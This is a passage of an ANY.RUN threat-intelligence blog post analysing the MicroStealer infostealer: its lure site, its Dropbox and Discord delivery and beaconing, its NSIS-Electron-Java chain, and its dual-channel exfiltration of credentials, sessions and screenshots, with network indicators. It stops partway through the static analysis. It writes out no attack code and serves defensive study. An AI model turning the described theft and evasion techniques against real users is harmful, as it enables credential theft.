{"id":19049,"date":"2026-03-12T09:56:43","date_gmt":"2026-03-12T09:56:43","guid":{"rendered":"\/cybersecurity-blog\/?p=19049"},"modified":"2026-03-25T10:16:50","modified_gmt":"2026-03-25T10:16:50","slug":"microstealer-technical-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/","title":{"rendered":"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0"},"content":{"rendered":"\n<p>Security teams depend on early signals to spot and contain new threats. But what happens when a fully capable infostealer spreads while traditional detections stay&nbsp;limited?&nbsp;<\/p>\n\n\n\n<p>In recent investigations, <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a> researchers observed MicroStealer in 40+ sandbox sessions in less than a month, despite low public visibility. Early activity points to distribution through compromised or impersonated accounts, with education and telecommunications among the affected sectors.<\/p>\n\n\n\n<p>MicroStealer is more than just another stealer. 
It targets browser credentials, session data, screenshots, and wallet files while using a layered NSIS \u2192 Electron \u2192 Java delivery chain that can slow confident detection.<\/p>\n\n\n\n<p>Let\u2019s break down how MicroStealer operates and how its behavior can be uncovered early in <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s interactive sandbox<\/a>, helping teams shorten time to verdict, reduce unnecessary escalations, and prevent credential theft from becoming a business impact.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key&nbsp;Takeaways&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>MicroStealer exposes a broader business risk by stealing browser credentials, active sessions, and other sensitive data tied to corporate access.<\/li>\n<li>The malware uses a layered <strong>NSIS \u2192 Electron \u2192 JAR<\/strong> chain that keeps its purpose unclear for longer and slows confident detection.<\/li>\n<li>Distribution through compromised or impersonated accounts makes the initial infection look more trustworthy to victims.<\/li>\n<li>For enterprises, the main danger is delayed visibility while identity compromise and data theft are already in progress.<\/li>\n<li><a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Behavior-based analysis<\/a> is critical for confirming the threat quickly and reducing time to 
containment.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">The Business Risk&nbsp;Behind&nbsp;MicroStealer&nbsp;<\/h2>\n\n\n\n<p>For security leaders, MicroStealer reflects a threat designed to steal identity data, maintain access, and increase the chance of a wider enterprise incident.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Corporate identities become exposed: <\/strong>Browser credential theft and session cookie extraction compromise SaaS accounts, internal portals, VPN sessions, and cloud administration access tied to employee browsers.<\/li>\n<li><strong>Privilege expansion becomes possible: <\/strong>Access to authentication tokens, browser sessions, and system credentials creates a path from a single compromised endpoint to privileged accounts and internal systems.<\/li>\n<li><strong>Stealthy access persists longer: <\/strong>Stolen session data allows attackers to operate through valid user sessions, blending malicious activity with legitimate traffic across enterprise services.<\/li>\n<li><strong>Data loss begins immediately: <\/strong>Screenshots, browser data, wallet files, and application artifacts are collected and exfiltrated through multiple channels, ensuring sensitive information leaves the environment quickly.<\/li>\n<li><strong>Attackers gain reconnaissance value: <\/strong>Profiling of Discord and Steam accounts provides intelligence about the victim\u2019s activity, helping attackers prioritize higher-value targets.<\/li>\n<\/ul>\n\n\n\n<p>MicroStealer highlights a familiar enterprise risk: attackers can use stolen identities, stealthy delivery methods, and fast data theft to stay undetected, expand access inside the environment, and increase the risk of operational, compliance, and reputational damage.<\/p>\n\n\n\n<!-- 
-->\n\n\n\n<h2 class=\"wp-block-heading\">Timeline of Observed&nbsp;MicroStealer&nbsp;Activity&nbsp;<\/h2>\n\n\n\n<p>MicroStealer activity was first observed on <strong>December 14<\/strong> in the following analysis session inside <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer 
noopener\">ANY.RUN sandbox<\/a>:<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/d59c90ed-820e-4f3d-be47-77bd997835aa\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Check analysis session<\/a>&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-1024x555.png\" alt=\"\" class=\"wp-image-19066\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-1024x555.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-300x163.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-768x416.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-1536x833.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-2048x1110.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-370x201.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-270x146.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-11-at-23.53.40-740x401.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>First&nbsp;observed&nbsp;analysis&nbsp;session&nbsp;with 
MicroStealer<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Over the following period, its activity continued to grow, and at the time of analysis it had already been identified in <strong>more than 40 sandbox sessions in less than one month<\/strong>, indicating an active distribution phase.<\/p>\n\n\n\n<p>However, despite the malware\u2019s growing spread, <strong>security vendors still largely fail to flag MicroStealer samples as malicious<\/strong>, as the figure below shows.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"714\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1024x714.png\" alt=\"Security\u00a0vendors\u00a0don\u2019t\u00a0flag\u00a0the\u00a0file\u00a0as\u00a0malicious\u00a0\" class=\"wp-image-19067\" style=\"width:556px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1024x714.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-300x209.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-768x536.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1536x1071.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-370x258.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-270x188.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-740x516.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee.png 1738w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption 
class=\"wp-element-caption\"><em>Security&nbsp;vendors&nbsp;don\u2019t&nbsp;flag&nbsp;the&nbsp;file&nbsp;as&nbsp;malicious<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>The highest concentration of detections was&nbsp;observed&nbsp;between&nbsp;<strong>January 7 and January 11<\/strong>, when&nbsp;<strong>20&nbsp;sandbox sessions&nbsp;<\/strong>containing&nbsp;MicroStealer&nbsp;activity were&nbsp;recorded. This suggests that&nbsp;MicroStealer&nbsp;is gaining traction.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">Catch emerging threats in \n<span class=\"highlight\">under 60 seconds\n<\/span> <br> <span class=\"highlight\">Reduce\u00a0time to verdict <\/span> with clear behavioral evidence\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktoregistration\" rel=\"noopener\" target=\"_blank\">\nRegister now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END 
-->\n\n\n\n<p>When visiting the malicious&nbsp;resource, the victim is presented with a&nbsp;<strong>visually appealing website:<\/strong>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"573\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-1024x573.png\" alt=\"Attacker-controlled\u00a0website\" class=\"wp-image-19068\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-1024x573.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-300x168.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-768x430.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-1536x860.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-370x207.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-270x151.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1-740x414.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1.png 1708w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Attacker-controlled&nbsp;website&nbsp;analyzed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>When the \u201cDownload Now\u201d button is clicked, a JavaScript file is executed. 
It downloads a malicious file from <strong>Dropbox<\/strong> and sends the victim\u2019s <strong>external IP address, region, OS version, and time zone<\/strong> to a Discord server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"190\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-1024x190.png\" alt=\"\" class=\"wp-image-19072\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-1024x190.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-300x56.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-768x143.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-370x69.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-270x50.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1-740x138.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image9-1.png 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"464\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-1024x464.png\" alt=\"\" class=\"wp-image-19073\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-1024x464.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-300x136.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-768x348.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-1536x697.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-370x168.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-270x122.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1-740x336.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagea-1.png 1936w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>This basic information serves as a beacon. However, if the downloaded malicious file is executed, MicroStealer steals data from web browser profiles, takes desktop screenshots, and sends the collected data as an archive to two destinations: a <strong>Discord server<\/strong> and a <strong>newly registered exfiltration server<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"483\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-1024x483.png\" alt=\"\" class=\"wp-image-19074\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-1024x483.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-300x142.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-768x362.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-370x175.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-270x127.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1-740x349.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-1.png 1318w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"521\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-1024x521.png\" alt=\"\" class=\"wp-image-19075\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-1024x521.png 1024w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-300x153.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-768x391.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-370x188.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-270x137.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-740x376.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec.png 1278w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Sending the archive to two destinations gives the attacker redundancy: the stolen data still arrives if one of the servers is taken down or blocked.<\/p>\n\n\n\n<p>MicroStealer also identifies itself by name in the User-Agent header of its first GET request to Discord, a simple network indicator for as long as the string stays unchanged:<\/p>\n\n\n\n<p><strong>User-Agent:<\/strong>&nbsp;MicroStealer\/1.0&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"972\" height=\"220\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged.png\" alt=\"\" class=\"wp-image-19076\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged.png 972w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-300x68.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-768x174.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-370x84.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-270x61.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-740x167.png 740w\" sizes=\"(max-width: 972px) 100vw, 972px\" \/><\/figure>\n\n\n\n<p>In addition to Dropbox, there were also cases where the sample was downloaded from other sources, for example:&nbsp;<a 
href=\"https:\/\/app.any.run\/tasks\/5ddccf49-dba9-4fb5-bfa6-451c92ebe2a1\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">cdn[.]discordapp[.]com<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Victimology and Targeting&nbsp;<\/h2>\n\n\n\n<p>Analysis of MicroStealer-related submissions to the <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN sandbox<\/a> shows that <strong>50% of observed sample uploads originated from the United States and Germany<\/strong>, pointing to notable activity in these regions.<\/p>\n\n\n\n<p>Based on the observed cases, the&nbsp;<strong>education<\/strong>&nbsp;and&nbsp;<strong>telecommunications<\/strong>&nbsp;sectors appear to face elevated exposure.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22microstealer%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>threatName:&#8221;microstealer&#8221;<\/strong><\/a><strong><\/strong>&nbsp;<\/p>\n\n\n\n<p>The distribution pattern also suggests that threat actors&nbsp;rely on&nbsp;<strong>compromised or impersonated accounts<\/strong>&nbsp;to deliver the malware, increasing the likelihood that victims will trust the source and execute the payload.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nSee if <span class=\"highlight\">emerging threats\n<\/span>are\u00a0targeting your industry and\u00a0region <br>Strengthen <span 
class=\"highlight\">proactive defense<\/span> with TI\u00a0Lookup\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktolookup\" rel=\"noopener\" target=\"_blank\">\nStart now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Inside the MicroStealer Execution Chain&nbsp;<\/h2>\n\n\n\n<p>The <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN sandbox<\/a> provides a clear overview of the <strong>MicroStealer execution chain<\/strong> and detects the malware\u2019s primary behavioral patterns, making it easier to begin the analysis.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"568\" 
src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-1024x568.png\" alt=\"Running\u00a0the\u00a0MicroStealer\u00a0Sample\u00a0in\u00a0ANY.RUN\u00a0\" class=\"wp-image-19084\" style=\"width:650px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-1024x568.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-300x166.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-768x426.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-1536x852.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-2048x1136.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-370x205.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-270x150.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-08.21.41-740x411.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Running&nbsp;the&nbsp;MicroStealer&nbsp;Sample&nbsp;in&nbsp;ANY.RUN<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>To better understand how each component operates, the analysis proceeds with <strong>static analysis<\/strong>. 
The first stage in the infection chain is <strong>RocobeSetup.exe<\/strong>.<\/p>\n\n\n\n<p>RocobeSetup is an <strong>NSIS installer (Nullsoft Scriptable Install System)<\/strong>, which becomes immediately apparent when analyzing the binary with <a href=\"https:\/\/github.com\/horsicq\/Detect-It-Easy\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Detect It Easy (DIE)<\/strong><\/a>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"604\" height=\"155\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1.jpg\" alt=\"Sample\u00a0Analysis\u00a0in\u00a0Detect\u00a0It Easy\u00a0\" class=\"wp-image-19085\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1.jpg 604w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1-300x77.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1-370x95.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-1-270x69.jpg 270w\" sizes=\"(max-width: 604px) 100vw, 604px\" \/><figcaption class=\"wp-element-caption\"><em>Sample&nbsp;analysis&nbsp;in&nbsp;Detect&nbsp;It Easy<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Since the installer has an archive structure, its contents can be listed with a general-purpose archiver (7-Zip understands the NSIS format) without executing the malware or resorting to specialized analysis tools.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"368\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3.jpg\" alt=\"Analysis\u00a0of\u00a0the\u00a0NSIS\u00a0Installer\u00a0Contents\u00a0\" class=\"wp-image-19086\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3.jpg 960w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-300x115.jpg 300w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-768x294.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-370x142.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-270x104.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-740x284.jpg 740w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><figcaption class=\"wp-element-caption\"><em>Analysis&nbsp;of&nbsp;the&nbsp;NSIS&nbsp;Installer&nbsp;contents&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Among the files, the next stage in the infection chain can already be identified: <strong>Game Launcher.exe<\/strong>, the Electron application. The analysis then moves on to the other directories within the archive.<\/p>\n\n\n\n<p>Inside the resources directory sit the Electron application archive <strong>app.asar<\/strong> (ASAR, Atom Shell Archive) and its companion directory <strong>app.asar.unpacked<\/strong>, where Electron keeps files that were excluded from the archive itself. The latter holds the <strong>main stealer module<\/strong>, an executable JAR file, together with a Java Runtime Environment (JRE), packaged inside the archive module.zip.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"82\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4.jpg\" alt=\"Analysis of the ASAR archive contents\" class=\"wp-image-19087\" style=\"width:636px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4.jpg 960w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-300x26.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-768x66.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-370x32.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-270x23.jpg 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-740x63.jpg 740w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"961\" height=\"64\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5.jpg\" alt=\"Analysis\u00a0of\u00a0the\u00a0ASAR\u00a0ArchiveContents\u00a0\" class=\"wp-image-19088\" style=\"width:650px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5.jpg 961w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-300x20.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-768x51.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-370x25.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-270x18.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-740x49.jpg 740w\" sizes=\"(max-width: 961px) 100vw, 961px\" \/><figcaption 